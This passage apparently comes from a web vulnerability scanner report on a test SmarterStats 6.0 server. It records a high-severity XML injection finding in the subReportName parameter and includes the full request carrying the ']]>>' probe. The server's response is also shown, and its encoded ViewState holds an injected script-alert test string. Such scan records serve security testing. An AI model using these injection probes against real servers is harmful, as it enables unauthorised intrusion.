$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.14. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [subReportName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The subReportName parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the subReportName parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=SiteUsage]]>> HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserSpiders"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:06 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44398



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=SiteUsage%5d%5d%3e%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTIyNzU0MjE4NQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYMAgMPZBYCAgEPZBYCAgEPZBYCZg9kFggCAQ8PFgIeB1Zpc2libGVoZGQCAw8PFgIeF0NsaWVudFNpZGVTY3JpcHRPbkNsaWNrBRJFbWFpbFJlcG9ydFBvcHVwKClkZAIFDw8WAh8DBRNFeHBvcnRSZXBvcnRQb3B1cCgpZGQCBw8PFgIfAwUSUHJpbnRSZXBvcnRQb3B1cCgpZGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ9kFgICAQ8WAh4EVGV4dAW7BDxkaXYgY2xhc3M9IlRpcFRleHRGYWlsdXJlIj5JbXBvcnQgRXJyb3I6IDEwLzExLzIwMTAgODowMiBQTSAtIEVSUk9SOiBDb3VsZCBub3Qgc2F2ZSBTaXRlSGlzdG9yeSBmaWxlIEM6XCYjeDAwMjI7JiN4MDAyRDsmI3gwMDJEOyYjeDAwM0U7JiN4MDAzQzsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDsmI3gwMDNFOyYjeDAwNjE7JiN4MDA2QzsmI3gwMDY1OyYjeDAwNzI7JiN4MDA3NDsmI3gwMDI4OyYjeDAwMzA7JiN4MDA3ODsmI3gwMDMwOyYjeDAwMzA7JiN4MDAzMDsmI3gwMDM3OyYjeDAwNDY7JiN4MDAzNzsmI3gwMDI5OyYjeDAwM0M7JiN4MDAyRjsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDtcV2ViTG9nc1wxXFNpdGVDb25maWcueG1sLm5ldzMuICBBcyBhIHByZWNhdXRpb24sIHRoaXMgc2VydmVyIGhhcyBiZWVuIHBhdXNlZC4gIEEgcmVib290IG1heSBiZSB0aGUgYmVzdCB3YXkgdG8gc29sdmUgYW55IGZpbGUgbG9ja2luZyBwcm9ibGVtcyB0aGF0IG1heSBiZSBwcmVzZW50Ljxicj48YnI+PGJyPjxicj48L2Rpdj5kAggPFgIfAmhkAgkPZBYCAgEPZBYeAgMPDxYQHgxTZWxlY3RlZERhdGUGAMBRYzcyzQgeB01pbkRhdGUGAEDK+KPo4AceB01heERhdGUGAABowSlcoQkeHEVuYWJsZUVtYmVkZGVkQmFzZVN0eWxlc2hlZXRoHhNFbmFibGVFbWJlZGRlZFNraW5zaB4EU2tpbgUMU21hcnRlclRvb2xzHghDc3NDbGFzcwUSRGF0ZVBpY2tlck92ZXJyaWRlHgRfIVNCAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkeDU9yaWdpbmFsVmFsdWUFFTEwLzUvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTA1LTAwLTAwLTAwHg1MYWJlbENzc0NsYXNzBQdyaUxhYmVsHhdFbmFibGVBamF4U2tpblJlbmRlcmluZ2gfCWgfBwYAQMr4o+jgB2QWBh4FV2lkdGgbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUhvdmVyHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFcnJvch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRm9jdXNlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRW5hYmxlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUUcmlUZXh0Qm94IHJpRGlzYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUVtcHR5Hw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRByaVRleHRCb3ggcmlSZWFkHw0CggJkAgEPDxYEHghJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYeDUhvdmVySW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmFgIeB29uY2xpY2sFPHJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkU3RhcnREYXRlJyksJ2NhbCcpO2QCAg8UKwANDxYaBQ9SZW5kZXJJbnZpc2libGVnBRFFbmFibGVNdWx0aVNlbGVjdGgFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNaW5EBgBAyvij6OAHBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQRNYXhEBgAAaMEpXKEJDxYIHwsFDFNtYXJ0ZXJUb29scx8KaB8JaB8QaGRkFgQfDAULcmNNYWluVGFibGUfDQICFgQfDAUMcmNPdGhlck1vbnRoHw0CAmQWBB8MBQpyY1NlbGVjdGVkHw0CAmQWBB8MBQpyY0Rpc2FibGVkHw0CAhYEHwwFDHJjT3V0T2ZSYW5nZR8NAgIWBB8MBQlyY1dlZWtlbmQfDQICFgQfDAUHcmNIb3Zlch8NAgIWBB8MBTZSYWRDYWxlbmRhck1vbnRoVmlldyBSYWRDYWxlbmRhck1vbnRoVmlld19TbWFydGVyVG9vbHMfDQICFgQfDAUJcmNWaWV3U2VsHw0CAmQCBw8PFhAfBgYAQMxh7jbNCB8HBgBAyvij6OAHHwgGAABowSlcoQkfCWgfCmgfCwUMU21hcnRlclRvb2xzHwwFEkRhdGVQaWNrZXJPdmVycmlkZR8NAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkfDgUWMTAvMTEvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTExLTAwLTAwLTAwHw8FB3JpTGFiZWwfEGgfCWgfBwYAQMr4o+jgB2QWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlIb3Zlch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAURcmlUZXh0Qm94IHJpRXJyb3IfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUZvY3VzZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUVuYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFFHJpVGV4dEJveCByaURpc2FibGVkHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFbXB0eR8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUQcmlUZXh0Qm94IHJpUmVhZB8NAoICZAIBDw8WBB8SBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8TBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxQFOnJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkRW5kRGF0ZScpLCdjYWwnKTtkAgIPFCsADQ8WGgUPUmVuZGVySW52aXNpYmxlZwURRW5hYmxlTXVsdGlTZWxlY3RoBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWluRAYAQMr4o+jgBwUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUDRVJTaAUSTmF2aWdhdGlvblByZXZUZXh0ZQULU3BlY2lhbERheXMPBZIBVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuQ2FsZW5kYXJEYXlDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQUETWF4RAYAAGjBKVyhCQ8WCB8LBQxTbWFydGVyVG9vbHMfCmgfCWgfEGhkZBYEHwwFC3JjTWFpblRhYmxlHw0CAhYEHwwFDHJjT3RoZXJNb250aB8NAgJkFgQfDAUKcmNTZWxlY3RlZB8NAgJkFgQfDAUKcmNEaXNhYmxlZB8NAgIWBB8MBQxyY091dE9mUmFuZ2UfDQICFgQfDAUJcmNXZWVrZW5kHw0CAhYEHwwFB3JjSG92ZXIfDQICFgQfDAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHw0CAhYEHwwFCXJjVmlld1NlbB8NAgJkAgkPFgIfAmhkAgsPFgIfAmhkAg0PFgIfAmhkAg8PFgIfAmhkAhEPFgIfAmhkAhMPFgIfAmhkAhUPFgIfAmhkAhcPFgIfAmhkAhkPFgIfAmgWAgIBDxBkZBYAZAIbDxYCHwJoZAIdDxYCHwJoZAIfDxYCHwJoZAIhDw8WAh8FBQpHZXQgUmVwb3J0ZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgYFFmN0bDAwJE1QSCRSYWRTdGFydERhdGUFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFFGN0bDAwJE1QSCRSYWRFbmREYXRlBR1jdGwwMCRNUEgkUmFkRW5kRGF0ZSRjYWxlbmRhcgUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXKTgIeSE/kwhinT4a3Qhsjk7T/NRv2iB6x/fy0Bw6CLSQ==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
